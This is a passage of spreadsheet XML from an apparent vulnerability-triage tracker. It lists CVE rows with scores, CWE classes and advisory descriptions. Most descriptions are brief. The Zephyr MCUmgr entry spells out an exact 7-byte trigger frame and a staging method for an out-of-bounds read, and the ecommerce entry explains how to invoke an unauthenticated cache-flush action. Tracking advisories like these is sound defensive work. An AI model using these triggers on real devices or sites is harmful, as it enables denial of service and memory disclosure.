        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q151" s="5" t="inlineStr"/>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S151" s="5" t="inlineStr">
        <is>
          <t>ip-address is a library for parsing and manipulating IPv4 and IPv6 addresses in JavaScript. From 10.2.0 until 10.5.1, the Address6 isPrivate classifier in src/ipv6.ts does not recognize the NAT64 local-use range 64:ff9b:1::/48. Applications that combine isPrivate, isLoopback, and isLinkLocal for a trust-boundary decision can treat an internal IPv4 destination encoded through that range as external. Exploitation depends on a server network using an operator-selected NAT64 prefix within the local-use range. A successful bypass can cross the intended network trust boundary. This issue is fixed in version 10.5.1.</t>
        </is>
      </c>
      <c r="T151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101910</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82935</t>
        </is>
      </c>
      <c r="D152" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="inlineStr"/>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr">
        <is>
          <t>aws, node.js</t>
        </is>
      </c>
      <c r="K152" s="5" t="inlineStr"/>
      <c r="L152" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q152" s="5" t="inlineStr"/>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>CWE-1104</t>
        </is>
      </c>
      <c r="S152" s="5" t="inlineStr">
        <is>
          <t>mH-DEVELOPER smart home module ships with an end-of-life, unsupported Debian 8 and Node.js runtime v17.0.1 in its production firmware. This exposes the device to publicly known vulnerabilities that will not receive security patches. An attacker could exploit these known flaws to execute arbitrary code, access sensitive data, or cause a denial of service on the device.
Vulnerable components were updated or hardened, if update was not possible in version 3.0.30</t>
        </is>
      </c>
      <c r="T152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82935</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91154</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>4daa8cea-433a-44bd-9456-53b127fc289a</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="inlineStr"/>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K153" s="5" t="inlineStr"/>
      <c r="L153" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q153" s="5" t="inlineStr"/>
      <c r="R153" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S153" s="5" t="inlineStr">
        <is>
          <t>Missing Authentication for Critical Function (CWE-306) in the product cache revalidation Server Action (src/app/actions.ts, revalidateProducts) in MarcosCamara01 Ecommerce Template before commit ec97209 allows a remote, unauthenticated attacker to force expiration of the entire storefront product cache at will. The file declares "use server" at file scope, so every exported function compiles into a POST-invokable Server Action; revalidateProducts calls updateTag("products") with no session or role check, unlike the read-only actions in the same file which are safe by construction. Two client components under src/components/admin import the function, which causes its Server Action id to be compiled into a public /_next/static chunk that the application's admin middleware (proxy.ts) does not gate, so any unauthenticated user can extract that id from the public bundle and invoke the action directly. With cacheComponents enabled, the entire storefront (home, categories, product pages, search) is served from "use cache" entries produced by getAllProducts, getCategoryProducts and getProduct, all tagged products with an hours-long cacheLife. Repeated unauthenticated invocation of revalidateProducts keeps that cache permanently cold, forcing every visitor's request to read the full product catalog from Postgres instead of serving from cache, degrading storefront availability at near-zero attacker cost.</t>
        </is>
      </c>
      <c r="T153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91154</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102247</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="inlineStr"/>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K154" s="5" t="inlineStr"/>
      <c r="L154" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q154" s="5" t="inlineStr"/>
      <c r="R154" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="S154" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in FastAdmin 1.6.1.20250430/1.6.5.20260602. This affects an unknown function of the file application/database.php of the component Database Management. The manipulation results in execution with unnecessary privileges. The attack may be launched remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="T154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102247</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18747</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>vulnerabilities@zephyrproject.org</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="inlineStr"/>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr"/>
      <c r="K155" s="5" t="inlineStr"/>
      <c r="L155" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q155" s="5" t="inlineStr"/>
      <c r="R155" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-191</t>
        </is>
      </c>
      <c r="S155" s="5" t="inlineStr">
        <is>
          <t>The MCUmgr SMP-over-console transport decodes a base64 frame, reads a 16-bit packet length from it, verifies a CRC and then unconditionally strips the trailing CRC with rx_ctxt-&gt;nb-&gt;len -= 2U; in mcumgr_serial_process_frag() (subsys/mgmt/mcumgr/transport/src/serial_util.c). mcumgr_serial_extract_len() accepted any declared length, including 0 and 1, and a packet declaring length 0 passes the checksum test for free because crc16_itu_t() over zero bytes returns the zero seed. Since net_buf::len is a uint16_t, the subtraction underflows and the buffer is handed to SMP claiming roughly 65 KB of payload while its data area is only CONFIG_MCUMGR_TRANSPORT_NETBUF_SIZE bytes (default 384).
The trigger is a single unauthenticated 7-byte line on the management console — the 0x06 0x09 packet marker followed by the base64 group AAA= and a newline — delivered to any transport built on this helper: CONFIG_MCUMGR_TRANSPORT_UART (smp_uart.c) or CONFIG_MCUMGR_TRANSPORT_SHELL (smp_shell.c), both of which select MCUMGR_TRANSPORT_SERIAL_HAS_SMP_OVER_CONSOLE. No prior session state, fragmentation or credentials are required to trigger the underflow, and the malformed frame is mishandled before any command handler or command-level access control runs. The attacker only needs write access to that console, which on many boards is a USB CDC-ACM port rather than a bare UART header.
With the inflated length, smp_process_request_packet() in subsys/mgmt/mcumgr/smp/src/smp.c loses its bound: cbor_nb_reader_init() gives the CBOR decoder a ~65 KB window into a 384-byte buffer, and each request header's nh_len is checked only against the inflated length. On its own the 7-byte frame re-parses whatever stale bytes the reused pool buffer still holds, typically a replay of the previously received request followed by a parse error, without leaving the buffer. Because the transport is unauthenticated, though, the attacker also controls the frames sent before the trigger, and can stage buffer contents so that a request succeeds with an nh_len larger than the buffer; net_buf_pull(), guarded only by __ASSERT_NO_MSG, then moves the parse cursor out of bounds and the loop reads further headers and CBOR from adjacent memory. The consequence is an out-of-bounds read that can fault the MCUmgr thread (denial of service); memory disclosure is also possible, since the default-enabled os echo handler (CONFIG_MCUMGR_GRP_OS_ECHO) decodes its string inside that window and copies it into its response. There is no integrity gain beyond what the unauthenticated transport already permits.
The fix rejects any declared packet length of two bytes or fewer in mcumgr_serial_extract_len(), so the CRC-strip subtraction can no longer underflow. The identical pattern remains in the test-only loopback transport subsys/mgmt/mcumgr/transport/src/smp_dummy.c (CONFIG_MCUMGR_TRANSPORT_DUMMY), which has no external input path and therefore carries no practical exposure.</t>
        </is>
      </c>
      <c r="T155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18747</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80359</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="inlineStr"/>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr">
        <is>
          <t>dell</t>
        </is>
      </c>
      <c r="K156" s="5" t="inlineStr"/>
      <c r="L156" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q156" s="5" t="inlineStr"/>
      <c r="R156" s="5" t="inlineStr">
        <is>
          <t>CWE-1191</t>
        </is>
      </c>
      <c r="S156" s="5" t="inlineStr">
        <is>
          <t>Dell Boot Optimized Server Storage (BOSS), versions prior to 2.2.13.2038, contains an On-Chip Debug and Test Interface With Improper Access Control vulnerability in the SMCU on 17G BOSS-N1 controllers. An unauthenticated attacker with physical access could potentially exploit this vulnerability, leading to Unauthorized access.</t>
        </is>
      </c>
      <c r="T156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80359</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93000</t>
        </is>
      </c>
      <c r="D157" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="inlineStr"/>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K157" s="5" t="inlineStr"/>
      <c r="L157" s="5" t="inlineStr"/>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q157" s="5" t="inlineStr"/>
      <c r="R157" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S157" s="5" t="inlineStr">
        <is>
          <t>The SPS-Suite WordPress plugin through 1.4.0 does not sanitise the search query before using it in a SQL query when its static-page search feature is enabled, allowing unauthenticated attackers to perform SQL injection attacks.</t>
        </is>
      </c>
      <c r="T157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93000</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-58386</t>
        </is>
      </c>
      <c r="D158" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E158" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="inlineStr"/>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr"/>
      <c r="K158" s="5" t="inlineStr"/>
      <c r="L158" s="5" t="inlineStr"/>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q158" s="5" t="inlineStr"/>
      <c r="R158" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S158" s="5" t="inlineStr">
        <is>
          <t>ZoneMinder versions 1.37.0 before 1.38.0 contain a path traversal vulnerability in the files view that allows authenticated users to read arbitrary files. The path parameter is not properly validated before being passed to output_file, enabling attackers with Events view permission to access sensitive files like configuration files containing database credentials.</t>
        </is>
      </c>
      <c r="T158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-58386</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101040</t>
        </is>
      </c>
      <c r="D159" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="inlineStr"/>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr"/>
      <c r="K159" s="5" t="inlineStr"/>
      <c r="L159" s="5" t="inlineStr"/>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q159" s="5" t="inlineStr"/>
      <c r="R159" s="5" t="inlineStr">
        <is>
          <t>CWE-404</t>
        </is>
      </c>
      <c r="S159" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Ricoh SP 330DN, SP 221, SP C252SF and Aficio SP 3500SF up to 20260813. This affects an unknown part of the component HTTP Multipart Form-Data Parser. Performing a manipulation results in denial of service. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101040</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101277</t>
        </is>
      </c>
      <c r="D160" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E160" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="inlineStr"/>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K160" s="5" t="inlineStr"/>
      <c r="L160" s="5" t="inlineStr"/>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q160" s="5" t="inlineStr"/>
      <c r="R160" s="5" t="inlineStr">
        <is>
          <t>CWE-348</t>
        </is>
      </c>
      <c r="S160" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Trusted Domain Project OpenDKIM up to 2.11.0. The impacted element is the function dkim_process_set of the file dkim.c of the component Tag Tokenizer. Performing a manipulation results in use of less trusted source. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101277</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101279</t>
        </is>
      </c>
      <c r="D161" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E161" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="inlineStr"/>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K161" s="5" t="inlineStr"/>
      <c r="L161" s="5" t="inlineStr"/>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q161" s="5" t="inlineStr"/>
      <c r="R161" s="5" t="inlineStr">
        <is>
          <t>CWE-189, CWE-190</t>
        </is>
      </c>
      <c r="S161" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in Trusted Domain Project OpenDMARC up to 1.4.2. This impacts an unknown function of the file libopendmarc/opendmarc_policy.c of the component DMARC Parser. The manipulation of the argument pct leads to integer overflow. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101279</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101914</t>
        </is>
      </c>
      <c r="D162" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="inlineStr"/>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr">
        <is>
          <t>npm, grpc</t>
        </is>
      </c>
      <c r="K162" s="5" t="inlineStr"/>
      <c r="L162" s="5" t="inlineStr">
        <is>
          <t>npm:@grpc/grpc-js-xds</t>
        </is>
      </c>
      <c r="M162" s="5" t="inlineStr">
        <is>
          <t>1.13.1, 1.14.1</t>
        </is>
      </c>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q162" s="5" t="inlineStr"/>
      <c r="R162" s="5" t="inlineStr">
        <is>
          <t>CWE-187, CWE-863</t>
        </is>
      </c>
      <c r="S162" s="5" t="inlineStr">
        <is>
          <t>@grpc/grpc-js implements the core functionality of gRPC purely in JavaScript, without a C++ addon. Prior to 1.13.1 and 1.14.1, the exact path (method name) matcher used by RBAC performs a prefix comparison instead of an equality comparison when case-insensitive matching is enabled. If one service method name prefixes another and the methods have different access rules, a request for the longer method can match the shorter method's rule and cause incorrect authorization. This issue is fixed in versions 1.13.1 and 1.14.1.</t>
        </is>
      </c>
      <c r="T162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101914</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102275</t>
        </is>
      </c>
      <c r="D163" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E163" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F163" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="inlineStr"/>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K163" s="5" t="inlineStr"/>
      <c r="L163" s="5" t="inlineStr"/>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q163" s="5" t="inlineStr"/>
      <c r="R163" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-348</t>
        </is>
      </c>
      <c r="S163" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.1.0 until 2.15.0, PyJWT OKPAlgorithm.from_jwk in  jwt/algorithms.py is affected because private-JWK import path does not compare the public key derived from d with x. This occurs when an OKP private JWK supplies non-corresponding x and d components. As a result, identity derived from x can differ from operations performed with d. Consequently, if an integration also accepts private key parameters from a proof header without rejecting them, an attacker may use a stolen sender-constrained token without the legitimate private key. This issue is fixed in version 2.15.0.</t>
        </is>
      </c>
      <c r="T163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102275</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102296</t>
        </is>
      </c>
      <c r="D164" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E164" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="inlineStr"/>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr"/>
      <c r="K164" s="5" t="inlineStr"/>
      <c r="L164" s="5" t="inlineStr"/>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q164" s="5" t="inlineStr"/>
      <c r="R164" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="S164" s="5" t="inlineStr">
        <is>
          <t>ZoneMinder before 1.38.4 contains static buffer overflow vulnerabilities in RemoteCameraHttp::GetResponse() that allow malicious HTTP cameras or intercepting attackers to overflow fixed-size buffers by sending oversized response headers. Attackers can send crafted HTTP responses with oversized status messages, Connection headers, Content-Type values, or multipart boundaries to corrupt parser state and crash the capture process or corrupt memory.</t>
        </is>
      </c>
      <c r="T164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102296</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102365</t>
        </is>
      </c>
      <c r="D165" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E165" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="inlineStr"/>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr"/>
      <c r="K165" s="5" t="inlineStr"/>
      <c r="L165" s="5" t="inlineStr"/>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
